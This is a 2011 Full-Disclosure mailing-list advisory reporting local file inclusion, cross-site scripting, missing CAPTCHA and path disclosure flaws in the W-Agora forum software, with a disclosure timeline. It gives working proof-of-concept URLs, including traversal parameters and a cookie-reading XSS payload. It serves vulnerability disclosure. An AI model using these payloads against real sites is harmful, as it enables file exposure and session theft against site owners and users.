
Date: Sat, 19 Mar 2011 20:49:06 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: LFI, IAA, XSS and FPD vulnerabilities in W-Agora

Hello list!

I want to warn you about Local File Inclusion, Insufficient Anti-automation,
Cross-Site Scripting and Full path disclosure vulnerabilities in W-Agora.

-------------------------
Affected products:
-------------------------

Vulnerable are W-Agora 4.2.1 and previous versions.

----------
Details:
----------

Local File Inclusion (WASC-31):

http://site/register.php?bn=1 (in folder conf)

http://site/register.php?bn=..\1 (in any folder - only on Windows-servers)

Local File Inclusion (WASC-31):

This vulnerability works in 4.0, but attack in Windows doesn't work in
4.2.1.

http://site/rss.php3?site=1 (in folder conf)

http://site/rss.php3?site=\..\1 (in any folder - only on Windows-servers)

Insufficient Anti-automation (WASC-21):

http://site/register.php?site=support

In the form there is no protection against automated requests (captcha).

XSS (WASC-08):

http://site/register.php?bn=%3Cbody%20onload=alert(document.cookie)%3E

XSS (WASC-08):

This vulnerability works in 4.0, but doesn't work in 4.2.1.

http://site/rss.php3?site=%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/rss.php?bn=1

------------
Timeline:
------------

2011.01.20 - announced at my site.
2011.01.21 - informed developers.
2011.01.23 - developer answered and promised to try to fix all holes, which
I informed him about in 2010-2011.
2011.01.24 - gave additional suggestions for developer.
2011.03.18 - disclosed at my site.

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4858/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
